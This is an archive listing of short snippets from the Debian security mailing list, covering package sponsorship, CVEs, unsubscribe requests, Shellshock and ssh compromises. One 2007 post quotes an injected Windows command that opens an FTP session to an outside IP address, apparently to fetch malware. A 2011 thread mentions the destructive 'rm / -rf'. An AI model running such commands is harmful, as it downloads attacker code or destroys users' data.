Request to join the team

2023-08-18 Thread David da Silva Polverari
Hi Team! My name is David Polverari, and I work with offensive security in the Brazilian Army. I have worked with and been mentored by both Eriberto and Thiago Andrade, and for the last two years I have maintained my own packages as a DM [1], and recently have become a DD. I have already

Re: Request for review/upload of firewalk 5.0-1

2021-05-03 Thread David da Silva Polverari
Hello Eriberto, Thanks for uploading! Regards, David On Fri, Apr 30, 2021 at 11:42:15PM -0300, Eriberto wrote: > Hi David, > > I just uploaded firewalk. Thanks for your work. > > Regards, > > Eriberto

Request for review/upload of firewalk 5.0-1

2021-04-24 Thread David da Silva Polverari
Hello team, I'm looking for a sponsor for a new package, firewalk [1]. Currently, it is a Kali-specific package [2]. Please, could you review it and upload it to experimental? Thanks. [1] https://salsa.debian.org/pkg-security-team/firewalk [2] http://pkg.kali.org/pkg/firewalk Regards, -- David

CVE-2016-6225 percona-xtrabackup Encryption IV Not Being Set Properly

2017-01-13 Thread David Busby
trabackup/pull/266 <https://github.com/percona/percona-xtrabackup/pull/266> https://github.com/percona/percona-xtrabackup/pull/267 <https://github.com/percona/percona-xtrabackup/pull/267> ( If the intent is to backport the fix rather than jump the version ). Cheers David David Busby,

Re: not getting compromised while applying apt-get upgrade for CVE-2016-1252

2016-12-16 Thread David Kalnischkies
volved as you can bootstrap from basically any system – getting apt to run on any system while not entirely impossible is considerably harder and it expects a reasonable systemstate to work with which a bootstrapping system is not… in exchange you don't get support for more advanced stuff like Valid-U

Re: Remove email

2016-03-31 Thread David Cachau
Hello, You need to send a mail to debian-security-requ...@lists.debian.org with "unsubscribe" as subject. You can also unsubscribe for some list here : https://www.debian.org/MailingLists/unsubscribe Best regards Le 31/03/2016 16:42, Tiffany Ryan a écrit : > > Please remove my email from you

Should Debian ask for a CPE when a CVE in Debian is found?

2016-02-12 Thread Wheeler, David A
for identification. More info on requesting CPEs here: https://nvd.nist.gov/cpe.cfm I thought I'd raise the idea. Thanks! --- David A. Wheeler

Re: [SECURITY] [DSA 3438-1] xscreensaver security update

2016-01-10 Thread David Cachau
Hello, You can follow instructions on this URL: https://www.debian.org/MailingLists/#subunsub Or use this form : https://www.debian.org/MailingLists/unsubscribe Good bye Le 11/01/2016 00:04, David ISIDORE a écrit : > Hi, I'm not on Debian anymore. How can I unsubscribe from mailing l

Re: [SECURITY] [DSA 3438-1] xscreensaver security update

2016-01-10 Thread David ISIDORE
Hi, I'm not on Debian anymore. How can I unsubscribe from mailing list? 2016-01-10 20:08 GMT+01:00 Michael Gilbert : > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA512 > > - - > Debian Security Advisory

RE: [SECURITY] [DSA 3386-2] unzip regression update

2015-11-11 Thread David McDonald
Bonaccorso Sent: Wednesday, 11 November 2015 4:52 PM To: David McDonald <david.mcdon...@semagroup.com.au> Cc: 'debian-security@lists.debian.org' <debian-security@lists.debian.org> Subject: Re: [SECURITY] [DSA 3386-2] unzip regression update Hi Dave, On Tue, Nov 10, 2015 at 09:54:19PM

RE: [SECURITY] [DSA 3386-2] unzip regression update

2015-11-10 Thread David McDonald
rom: Salvatore Bonaccorso [mailto:salvatore.bonacco...@gmail.com] On Behalf Of Salvatore Bonaccorso Sent: Tuesday, 10 November 2015 8:46 PM To: David McDonald <david.mcdon...@semagroup.com.au> Cc: 'debian-security@lists.debian.org' <debian-security@lists.debian.org> Subject: Re: [SE

RE: [SECURITY] [DSA 3386-2] unzip regression update

2015-11-09 Thread David McDonald
Hi Salvatore, Your e-mail below states: "For the stable distribution (jessie), this problem has been fixed in version 6.0-16+deb8u2" (Nota bene the last digit) However, https://www.debian.org/security/2015/dsa-3386 states: "For the stable distribution (jessie), these problems

Re: [SECURITY] [DSA 3265-1] zendframework security update

2015-05-20 Thread David Peacock
Unsubscribe On 20 May 2015 at 05:37, David Prévot da...@tilapin.org wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-3265-1 secur...@debian.org http

Re: [SECURITY] [DSA 3149-1] condor security update

2015-02-03 Thread David Schneider
Hello Günter, I am the deputy for security (until Salvatore is back). Could you check whether we are affected by this (see below)? Regards, David Schneider On 02.02.2015 19:50, Sebastien Delafond wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA256

Re: [SECURITY] [DSA 3074-2] php5 regression update

2014-11-19 Thread David MENTRE
Hello, Le 19/11/2014 11:49, Yves-Alexis Perez a écrit : so people are advised to keep kernel symlink protection (sysctl fs.protected_symlinks=1) enabled as it is by default on Wheezy This setting is not set on my Wheezy machine. How can I set it permanently (i.e. across reboots). Best

Re: [SECURITY] [DSA 3074-2] php5 regression update

2014-11-19 Thread David MENTRE
, david -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/546caccf.8070...@linux-france.org

Archive GPG key expiring process

2014-10-17 Thread David Hubner
after the attack happened with a new master key that would mean nobody could apt-get the debian-keyring package for the new public key. I am wondering if I am missing something. Is there a process for this possibility? Thanks -- David Hubner Software Engineer david.hub...@smoothwall.net

Re: about bash and Debian Lenny

2014-10-01 Thread David Dejaeghere
Lenny in its current state. If you need to secure your old boxes you will have to look for alternative methods outside of supported packages. Think about improved firewalling. What attack vectors of the shellshock exploit are worrying to you? Regards, David 2014-10-01 13:45 GMT+02:00 Nikolay

Re: about bash and Debian Lenny

2014-10-01 Thread David Dejaeghere
With Qmail exposed and being an attack vector I would advise to build your own updated bash package. You won't get official security updates. 2014-10-01 14:06 GMT+02:00 Nikolay Hristov ge...@stemo.bg: On 10/01/2014 02:58 PM, Konstantin Khomoutov wrote: On Wed, 1 Oct 2014 14:45:55 +0300

Re: about bash and Debian Lenny

2014-10-01 Thread David Dejaeghere
Also about not trusting people, you are sending to this list with your company email address and tell everyone here you have an exploitable qmail setup running. Be careful with the information you make public. Regards, David 2014-10-01 14:17 GMT+02:00 David Dejaeghere david.dejaegh

Re: Checking for services to be restarted on a default Debian installation

2014-09-10 Thread David Prévot
coordination, or even i18n help if needed) if you wish to. Regards David

Re: Checking for services to be restarted on a default Debian installation

2014-09-07 Thread David Prévot
? Not restarting the DM by default seems to be a nice thing to have. How does it work if the upgrade runs in the background? Will all needed services be restarted without asking? (If so, the gdm3 restart issue may be a blocker). Regards David

Re: Checking for services to be restarted on a default Debian installation

2014-09-07 Thread David Prévot
Le 07/09/2014 10:54, Paul Wise a écrit : On Sun, Sep 7, 2014 at 9:30 PM, David Prévot wrote: How does it work if the upgrade run in the background? Will all needed service be restarted without asking? (If so, the gdm3 restart issue may be a blocker). Not sure what you mean

Re: Checking for services to be restarted on a default Debian installation

2014-09-02 Thread David Prévot
Regards David

Re: Please remove me from this list

2014-06-26 Thread Erwan David
Le 26/06/2014 16:06, Jason Fergus a écrit : Ha ha, made me laugh. Speaking of lists, I wish I knew how Evolution knows to ask if one would like to reply to the list or the sender. My work uses a bunch of mailing lists, and I always feel like I'm breaking list etiquette when I have to do a

Re: Debian mirrors and MITM

2014-05-30 Thread Erwan David
Le 30/05/2014 21:30, Joey Hess a écrit : Alfie John wrote: Taking a look at the Debian mirror list, I see none serving over HTTPS: https://www.debian.org/mirror/list https://mirrors.kernel.org/debian is the only one I know of. It would be good to have a few more, because there are

Re: Debian mirrors and MITM

2014-05-30 Thread Erwan David
Le 30/05/2014 22:02, Henrique de Moraes Holschuh a écrit : On Fri, 30 May 2014, Erwan David wrote: Le 30/05/2014 21:30, Joey Hess a écrit : Alfie John wrote: Taking a look at the Debian mirror list, I see none serving over HTTPS: https://www.debian.org/mirror/list https

Re: Debians security features in comparison to Ubuntu

2014-05-17 Thread Erwan David
Le 17/05/2014 18:38, Jan Moskyto Matejka a écrit : I might be misinterpreting your definition of meaningful, but I have been looking for a public entropy source for my Debian system for quite a while. If you can point me to the Debian equivalent of pollinate and https://entropy.ubuntu.com/

Re: finding a process that bind a spcific port

2014-01-22 Thread Erwan David
On Wed, Jan 22, 2014 at 02:33:27PM CET, Nico Angenon n...@creaweb.fr said: no output Thanks for all... Nico You may also try lsof -i udp:10001 Launch it as root, because a normal user cannot see the descriptors of processes owned by others.

Re: MIT discovered issue with gcc

2013-11-27 Thread David L. Craig
On 13Nov27:2356+1100, Scott Ferguson wrote: On 27/11/13 23:37, David L. Craig wrote: On 13Nov27:1423+1100, Scott Ferguson wrote: On 27/11/13 13:49, David L. Craig wrote: On 13Nov26:1545-0500, David L. Craig wrote: On 13Nov26:1437-0500, Mark Haase wrote: Therefore, a Linux

Re: MIT discovered issue with gcc

2013-11-26 Thread David L. Craig
On 13Nov26:1437-0500, Mark Haase wrote: Therefore, a Linux distribution has 2 choices: (1) wait for upstream patches for bugs/vulnerabilities as they are found, or (2) recompile all packages with optimizations disabled. I don't think proposal #2 would get very far... Well, there's always -O1

Re: MIT discovered issue with gcc

2013-11-26 Thread David L. Craig
On 13Nov26:1545-0500, David L. Craig wrote: On 13Nov26:1437-0500, Mark Haase wrote: Therefore, a Linux distribution has 2 choices: (1) wait for upstream patches for bugs/vulnerabilities as they are found, or (2) recompile all packages with optimizations disabled. I don't think proposal

Re: [SECURITY] [DSA 2758-1] python-django security update

2013-09-17 Thread David Moscrip
Salvatore Bonaccorso car...@debian.org wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2758-1 secur...@debian.org http://www.debian.org/security/

Re: (Case MB46439) [SECURITY] [DSA 2641-2] libapache2-mod-perl2 update related to DSA 2641-1

2013-03-20 Thread David Dejaeghere
I hope that is a golden ticket. I want to visit the chocolate factory! 2013/3/20 Mythic Beasts supp...@mythic-beasts.com Thank you for your mail to Mythic Beasts Support. Your query has been received, and we will respond shortly. Please preserve the case number in the subject line of any

Re: NULL Scan issues or something else?

2013-02-08 Thread Erwan David
On Fri, Feb 08, 2013 at 02:06:48PM CET, Daniel Curtis sidetripp...@gmail.com said: Hi Mr Erwan So, everything is okay? Even these strange logs mentioned earlier? I'm still curious about this rule; SYN,RST, ACK,FIN, PSH,URG, SYN,RST,ACK, FIN,PSH,URG What do you mean by writing, that I

Re: NULL Scan issues or something else?

2013-02-07 Thread Erwan David
Le 07/02/2013 19:34, Daniel Curtis a écrit : Hi Thank you all for your answers. They are very helpful. I have to mention some thing, which I forgot to write; * no running services * all ports are closed (according to e.g. nmap) * iptables has concerning rules about /INVALID/ packets *

Re: NULL Scan issues or something else?

2013-02-07 Thread Erwan David
Le 07/02/2013 21:22, Daniel Curtis a écrit : Hi, //(...)/Nothing that should bother you. / Okay, so far so good. But what about the rest of IP addresses, which occurred in logs? You have mentioned about a /bendel.debian.org http://bendel.debian.org/ website. I wonder why? Because that's the

Re: Use of DSA number for general announcements

2012-09-15 Thread David Prévot
Hi, Le 14/09/2012 01:47, Thijs Kinkhorst a écrit : On Fri, September 14, 2012 03:28, David Prevot wrote: This is a notice to inform you, that our previous PGP/GPG key expired. Thanks for notifying us on debian-security-announce@l.d.o, but I disagree that such an announcement deserves a DSA

Use of DSA number for general announcements (was: [DSA 2548-1] Debian Security Team PGP/GPG key change notice)

2012-09-13 Thread David Prévot
announcement. Regards David

Bug#685646: Please advise a reliable version scheme for {stable,testing}{,-security}

2012-08-22 Thread David Prévot
memory isn't entirely failing me […] 16:46 adsb at least the multi-archive changes mean the upload signature is now only checked once, so the key expiry foo goes away Regards David -- System Information: Debian Release: wheezy/sid APT prefers unstable APT policy: (500, 'unstable'), (500

Re: sun-java6-plugin outdated and vulnerable to an actively exploited security issue

2012-08-16 Thread Erwan David
On Thu, Aug 16, 2012 at 11:37:09AM CEST, Thijs Kinkhorst th...@debian.org said: Hi Adam, On Thu, August 16, 2012 07:56, echo083 wrote: The sun-java6 in the stable branch is the version 1.6.0_26 is there a plan for any security upgrade ? I'm afraid that's not possible. Oracle has

Re: [SECURITY] [DSA 2523-1] globus-gridftp-server security update

2012-08-08 Thread David Prévot
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Le 08/08/2012 20:25, Mike Mestnik a écrit : On 08/06/12 22:47, maestro wrote: #please unsubscribe me from this list # i do not find any link to do so. # thank you. Instructions can be found at the bottom, there is no link or URL. Actually,

Security Implications of DKMS?

2012-03-26 Thread David Ehle
of DKMS? How are you balancing the convenience (now sometimes need) of DKMS vs the risk of having compilers on servers? If you're saying no, how are you getting the modules onto your secure systems? If this is a solved issue could you direct me to good documentation? Thanks! David

Re: Debian Oval definitions for 2011

2011-10-11 Thread David Prévot
Thanks for your hint, Javier (author of the script used to generate those) and the security team CCed to gather more information. Regards David

Re: Debian LTS?

2011-10-05 Thread Erwan David
On 05/10/11 19:13, wer...@aloah-from-hell.de wrote: Hi all, a Debian LTS-Version would be so welcome and is definitely something that's missing for Debian. best, Werner Isn't it called stable ?

Re: Debian LTS?

2011-10-05 Thread Erwan David
On 06/10/11 00:13, Sythos wrote: On Wed, 05 Oct 2011 19:13:33 +0200 wer...@aloah-from-hell.de wrote: Hi all, a Debian LTS-Version would be so welcome and is definitely something that's missing for Debian. in 18 years Debian released 6 stable, an average of 3 years between a stable

Fwd: Application Icons Design

2011-09-12 Thread David
: Draft for apps for twitter ===8==Original message text=== Hello David, Timeframe is 3 weeks. It's possible to discuss a budget next week with skype, Please try to ask the following icon designer: debian-security@lists.debian.org ===8===End of original message

Re: AUTO: Steve Bownas is out of the office. (returning 09/06/2011)

2011-08-21 Thread David Giard
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Are we going to receive those every time he is out of the office? I hope someone will do something about it... On 2011-08-21 16:17, Steven Bownas wrote: I am out of the office until 09/06/2011. I will be out of the office from Mon Aug 22 through

Re: CVE Exploit

2011-03-11 Thread Erwan David
On Fri, Mar 11, 2011 at 04:08:29PM CET, Mike! nibl...@gmail.com said: On 03/11/2011 04:06 PM, Jordon Bedwell wrote: On 3/11/2011 9:04 AM, Andrey Rahmatullin wrote: On Fri, Mar 11, 2011 at 09:42:17AM -0500, hans wrote: rm / -rf worked fine last time I tried it on a VM as an experiment. It was

No DSA for isc-dhcp

2011-03-04 Thread David Prévot
Thanks in advance if you could fix this. Regards David

Re: Bug#603470: libmapnik0.7: package linked against broken external AGG

2010-11-15 Thread David Paleino
it easier to read in future) Thank you, David -- . ''`. Debian developer | http://wiki.debian.org/DavidPaleino : :' : Linuxer #334216 --|-- http://www.hanskalabs.net/ `. `'` GPG: 1392B174 | http://deb.li/dapal `- 2BAB C625 4E66 E7B8 450A C3E1 E6AA 9017 1392 B174 diff --git a/debian

unprivileged users may hijack forwarded X connections

2008-04-29 Thread David Ehle
if this has been addressed? Are there any plans to do so? Thanks! -- David Ehle Computing Systems Manager CAPP CSRRI rm 077 LS Bld. IIT Main Campus Chicago IL 60616 [EMAIL PROTECTED] 312-567-3751 He who fights with monsters must take care lest he thereby become a monster. And if you gaze

Re: unprivileged users may hijack forwarded X connections

2008-04-29 Thread David Ehle
. -- David Ehle Computing Systems Manager CAPP CSRRI rm 077 LS Bld. IIT Main Campus Chicago IL 60616 [EMAIL PROTECTED] 312-567-3751 He who fights with monsters must take care lest he thereby become a monster. And if you gaze for long into an abyss, the abyss gazes also into you. On Tue, 29 Apr 2008

Re: Re: Is oldstable security support duration something to be proud of?

2008-03-10 Thread David Ehle
Please take this discussion off list. It has nothing to do with security. Take it to some list that has to do with debian policy, announcements, the web-page or anyplace else where it might be relevant. Great job Security team. Thanks for all your work. -- David Ehle Computing Systems

Re: [SECURITY] [DSA 1479-1] New Linux 2.6.18 packages fix several vulnerabilities

2008-01-29 Thread David Nowak
Moe sir what is the code for the phone I'm havin a brain fart -Original Message- From: [EMAIL PROTECTED] To: [EMAIL PROTECTED] [EMAIL PROTECTED] BCC: David Nowak [EMAIL PROTECTED] Creation Date: 1/29 1:04 pm Subject: [SECURITY] [DSA 1479-1] New Linux 2.6.18 packages fix several

Debian suggestion on File Deletion

2007-12-12 Thread David de Hilario Richards
would ask for a password every time you would want to delete a file. To my knowledge, today the only way of protecting files in a similar way is to create different user profiles with different permissions. Hope you will take my suggestion into account. Regards, David

Restrict remote access by time?

2007-05-25 Thread David Ehle
, research leads, or input from those who have put together similar projects. Thanks in Advance! David. -- David Ehle Computing Systems Manager CAPP CSRRI rm 077 LS Bld. IIT Main Campus Chicago IL 60616 [EMAIL PROTECTED] 312-567-3751 He who fights with monsters must take care lest he thereby become

Re: spooky windows script

2007-05-08 Thread David Clymer
On Tue, 2007-05-08 at 14:57 +0200, Jan Outhuis wrote: Hello, Recently I'm repeatedly being pestered by a strange event while surfing the net. My cursor is taken over and the following code is typed: %systemroot%\system32\cmd.exe cmd /c echo open 59.31.153.120 22783 ik echo user db

Re: About GPG-signing the public RSA keys of Debian machines

2006-10-10 Thread David Clymer
On Tue, 2006-10-10 at 02:12 +0200, Joerg Jaspert wrote: On 10802 March 1977, Florent Rougon wrote: ... 2. I have to trust the integrity of db.debian.org. Signing the keys you would have to trust whoever signed it. Same thing. I don't see that as being the same thing at all. Without

Re: About GPG-signing the public RSA keys of Debian machines

2006-10-10 Thread David Clymer
On Tue, 2006-10-10 at 21:57 +0200, Florent Rougon wrote: [ I think debian-admin have read enough about my request by now, so if you reply about verifying certificates and such, please consider dropping the CC. Thanks. ] Kurt Roeckx [EMAIL PROTECTED] wrote: See:

Re: About GPG-signing the public RSA keys of Debian machines

2006-10-10 Thread David Clymer
On Tue, 2006-10-10 at 22:24 +0200, Joerg Jaspert wrote: On 10803 March 1977, Kurt Roeckx wrote: I assume you've used https and that you verified the certificate? And saw that it was issued by SPI? And then you looked up SPI's certificate? And you found that there is a text file with

Re: [SECURITY] [DSA 1195-1] new openssl096 packages fix denial of service

2006-10-10 Thread David Kennedy CISSP
-- Regards, David Kennedy CISSP. Protect what you connect; Look both ways before crossing the Net. (ASCII Ribbon Campaign Against HTML Mail)

Re: [SECURITY] [DSA 1172-1] New bind9 packages fix denial of service

2006-09-09 Thread David Broome
with: Sep 9 00:28:15 stan named[5638]: couldn't open pid file '/var/run/bind/run/named.pid': Permission denied Sep 9 00:28:15 stan named[5638]: exiting (due to early fatal error) I just had to change the 'bind' users group to the new bind group. Dave, -- David Broome Sr. Programmer Analyst

Re: su - and su - what is the real difference?

2006-07-28 Thread David Ehle
. So, I would be interested in hearing what the additional security implications would be. David. -- David Ehle Computing Systems Manager CAPP CSRRI rm 077 LS Bld. IIT Main Campus Chicago IL 60616 [EMAIL PROTECTED] 312-567-3751 He who fights with monsters must take care lest he thereby become

AW: [SECURITY] [DSA 1048-1] New Asterisk packages fix arbitrary codeexecution

2006-05-02 Thread David Lindner
I think we always use the latest stable version. Regards, D -Ursprüngliche Nachricht- Von: Martin Schulze [mailto:[EMAIL PROTECTED] Gesendet: Montag, 01. Mai 2006 06:38 An: Debian Security Announcements Betreff: [SECURITY] [DSA 1048-1] New Asterisk packages fix arbitrary

Re: Pam module for hylafax

2006-04-18 Thread David Clymer
On Tue, 2006-04-18 at 17:39 +0400, Adarsh V.P wrote: hi i am using hylafax with debian sarge.I can only use the fax utilites(sendfax,faxstat,...) while logging in as root. Access is denied while trying to connect to the hylafax server from clients. i just made a module called hylafax and

unsubscribe

2006-03-15 Thread Antonio David Lopez
-Mensaje original- De: Martin Schulze [mailto:[EMAIL PROTECTED] Enviado el: miércoles, 15 de marzo de 2006 9:43 Para: Debian Security Announcements Asunto: [SECURITY] [DSA 1002-1] New webcalendar packages fix several vulnerabilities -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 -

Re: Bonk vulnerability!

2006-03-03 Thread David Clymer
On Fri, 2006-03-03 at 13:01 -0700, Michael Loftis wrote: --On March 3, 2006 10:01:54 AM -0800 Zakai Kinan [EMAIL PROTECTED] wrote: I just installed a server with sarge 3.1 and after testing it with nessus it is vulnerable to bonk. I am trying to figure out how that is possible and

Re: [SECURITY] [DSA 926-1] New ketm packages fix privilege escalation

2005-12-23 Thread david . ahlard
Hi, I am on Christmas leave and will not be back until Monday, January 2nd. For installation matters, email [EMAIL PROTECTED] or call payread at 08-20 83 70. Kind regards, David Ahlard

Re: unsubscribe

2005-10-12 Thread David Clymer
On Thu, 2005-10-13 at 01:28 +0200, Peter Palfrader wrote: On Tue, 11 Oct 2005, Benjamin Maerte wrote: -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED] Learn to read the mails you're replying to, will you? Peter

Re: SELinux

2005-09-21 Thread David Pastern
On Thu, 2005-09-22 at 04:40 +1000, Arvind Autar wrote: Hello, I have been using debian for quite some time now, however I have watched several distributions implementing so many great ideas, and I have been wondering why such a robust distribution as debian GNU/Linux(*) hasn't done this.

Re: policy change is needed to keep debian secure

2005-08-23 Thread David Ehle
their system offline and not put the security line in their sources- as security will require changes at some level. I support introducing new packages when older versions can not be realistically maintained with backported security fixes. -- David Ehle Computing Systems Manager CAPP CSRRI BIOCAT rm 077

Re: policy change is needed to keep debian secure

2005-08-23 Thread David Ehle
On Tue, 23 Aug 2005, Matt Zimmerman wrote: On Tue, Aug 23, 2005 at 12:04:17PM -0500, David Ehle wrote: As you can see in the subject, the OP understands the policy, but believes it should be changed. To what? The suggestions that I have seen so far seem to be reiterations

Re: policy change is needed to keep debian secure

2005-08-21 Thread David Ehle
I second this post. Dan, Thank you for saying so clearly. On Sat, 20 Aug 2005, Daniel Sterling wrote: Keeping Debian stable by not changing things is great. Except maybe its not so great when you're trying to maintain a complicated, buggy, high profile program that handles sensitive user

Re: On Mozilla-* updates

2005-08-02 Thread David Ehle
have servers that can be used to build at least two of the architectures. David. -- David Ehle Computing Systems Manager CAPP CSRRI rm 077 LS Bld. IIT Main Campus Chicago IL 60616 [EMAIL PROTECTED] 312-567-3751 He who fights with monsters must take care lest he thereby become a monster

Re: On Mozilla-* updates

2005-08-02 Thread David Ehle
fashion, and the situation either not be resolved or we do something stupid like drop mozilla. Just for the record I also vote against volatile. Security changes should go into stable proper. david.

Re: On Mozilla-* updates

2005-07-31 Thread David Ehle
Despite of the fact, the the release is probably unable to match the mozilla release cycles - do you really think, mozilla is the one and only package, debian is all about? Well, I mean the killer application, the thin that justify Debian? Keep smiling yanosz For my end users, who have

Re: On Mozilla-* updates

2005-07-31 Thread David Ehle
systems. Debian in MY opinion is as much a desktop distro as it is a server distro, and support for both is equally important. David.

root login denied. But by what?

2005-06-17 Thread David Ramsden
release of stable. Does anyone know what generated the above log entries? And why is there no ip? Regards, David. -- .''`. David Ramsden [EMAIL PROTECTED] : :' :http://david.hexstream.co.uk/ `. `'` PGP key ID: 507B379B on wwwkeys.pgp.net `- Debian - when my girlfriend's away

Re: root login denied. But by what?

2005-06-17 Thread David Ramsden
On Fri, Jun 17, 2005 at 10:47:49PM +0200, Marcin Owsiany wrote: On Fri, Jun 17, 2005 at 07:33:02PM +0100, David Ramsden wrote: Does anyone know what generated the above log entries? try: find /usr/sbin /sbin /usr/local/sbin \ /usr/bin /usr/local/bin /bin /usr/lib /lib -type f

Security status of orphaned woody packages when upgraded to sarge?

2005-05-10 Thread David Stanaway
even if you check debian security advisories diligently. -- David Stanaway [EMAIL PROTECTED]

Re: User 501 and /usr/local

2005-05-09 Thread David Clymer
On Mon, 2005-05-09 at 07:30 -0700, JM wrote: I guess what I was trying to say should not this directory be owned by root and with a 755 permissions? Default debian permissions on /usr/local are: drwxrwsr-x 11 root staff 115 2005-03-23 13:42 local -davidc -- It is not the mountain we

Re: Dns refresh

2005-04-27 Thread David Clymer
There is really no excuse for such egregious cross posting. Please send questions to appropriate mailing lists only, preferably one at a time. On Wed, 2005-04-27 at 15:58 -0300, Servilink Santiago Francos wrote: Hello, I have a server and I changed the ip number of the server and the

Snort log stuff

2005-04-18 Thread David Clymer
Over the last few days, I've seen the following type of entry in my snort report: The distribution of event methods === %# of method === 5.81 5 (portscan) TCP Portsweep 3

Re: My machine was hacked - possibly via sshd?

2005-03-30 Thread David Pastern
On Wed, 2005-03-30 at 17:55 +1000, Andrew M.A. Cater wrote: On Tue, Mar 29, 2005 at 05:08:32PM -0500, Noah Meyerhans wrote: On Wed, Mar 30, 2005 at 07:16:31AM +1000, David Pastern wrote: And this, in reality, is why Woody is so old. I cannot imagine any other distro providing

Re: My machine was hacked - possibly via sshd?

2005-03-30 Thread David Pastern
On Wed, 2005-03-30 at 20:34 +1000, Matthew Palmer wrote: On Wed, Mar 30, 2005 at 07:02:55PM +1000, David Pastern wrote: Redhat/Fedora/Suse/Mandrake are just plain silliness. However - there is a big difference between a one year release cycle, and the fact that it's been nearly 3 years

Re: OT - was Re: My machine was hacked - possibly via sshd?

2005-03-30 Thread David Pastern
On Wed, 2005-03-30 at 21:35 +1000, Ivan Brezina wrote: Let me point, that meaning of word stable is different for RedHat/SUSE. Debian stable is more like frozen - no bugfixes, no new drivers no new features. Just security fixes and some critical fixes. RedHat stable is more like solid

Re: My machine was hacked - possibly via sshd?

2005-03-29 Thread David Pastern
On Tue, 2005-03-29 at 15:25 -0500, Noah Meyerhans wrote: On Tue, Mar 29, 2005 at 01:38:55PM +0100, Simon Heywood wrote: Sorry, but this isn't correct. kernel 2.4.18-1 in woody is patched against known vulnerability. The security team have quietly stopped updating it, preferring to

Re: My machine was hacked - possibly via sshd?

2005-03-28 Thread David Pastern
On Tue, 2005-03-29 at 07:25 +1000, Malcolm Ferguson wrote: Thanks for all the feedback everybody. It looks like an ssh dictionary attack discovered a weak password, followed by a local root exploit against an out-of-date kernel. From now on I will be sticking with an official Debian

Re: Analysis vulnerabilities associated to published security advisories, anyone?

2005-03-09 Thread David Schmitt
with input and output. http://people.debian.org/~skx/2005/ Nice script. I fixed it up to sanitise 'sanitizations' and sort output by count. diff attached. Regards, David -- - hallo... wie gehts heute? - *hust* gut *rotz* *keuch* - gott sei dank kommunizieren wir über ein septisches medium

Re: Packet sniffing regular users

2005-03-03 Thread David Mandelberg
Alvin Oga wrote: ah .. good point ... i make no distinction between local access vs physical access in that if the server is behind the locked door, it'd be better than if its on the corp server in the next open cubicle on the same cat 5 wires, hubs and switches etc Physical access means they

Re: Packet sniffing regular users

2005-03-02 Thread David Mandelberg
s. keeling wrote: Do you understand what anyone can see anything really means? Have you pumped tcpdump output into ethereal lately? anyone can see anything really means anyone can see anything. Think about it. And what's the real reason why you don't want to bother with sudo? I'm curious,

Re: Packet sniffing regular users

2005-03-02 Thread David Mandelberg
s. keeling wrote: ... should be != are. Are you sure no-one there's using telnet, ftp, etc? If they send their confidential data unencrypted, that's not my fault, and there's not much I can do to stop them (even if I somehow make it impossible on my computers, they could still go to a library

Re: Packet sniffing regular users

2005-03-02 Thread David Mandelberg
s. keeling wrote: Isn't it generally accepted that black hats who get local access (ie., a user login account) is _much_ worse than black hats who've been kept out? Assuming black hat wants root, taking over a user's account is a very big first step. I would take the security of your user's

Re: Packet sniffing regular users

2005-03-02 Thread David Mandelberg
Alvin Oga wrote: no more telnet, no more pop3, no more wireless, no more anything that is insecure Those are not insecure: using them unwisely is. Telnet over a VPN is just as secure as ssh with password authentication. The same goes for pop3/pop3s. Wireless is completely different

RE: Rkhunter : old or patched

2005-01-25 Thread David Ross
Hi I also use rkhunter and have noticed this. Before I upgraded to rkhunter 1.1.9 I used 1.1.8 and used to get a different message when it does an application version scan, it used to moan and say that I have vuln packages when I'm pretty sure I didn't as I ran security updates/upgrades everyday

Re: [SECURITY] [DSA 644-1] New chbg packages fix arbitrary code execution

2005-01-21 Thread David Mandelberg
archives at lists.ubuntu.com for the Scary .desktop behaviour thread. I was pondering complicated solutions with alternate stream hacks (like XPSP2 uses), but your suggestion is much simpler and would require minimal changes to the system. On Wed, 2005-01-19 at 06:52 -0500, David Mandelberg
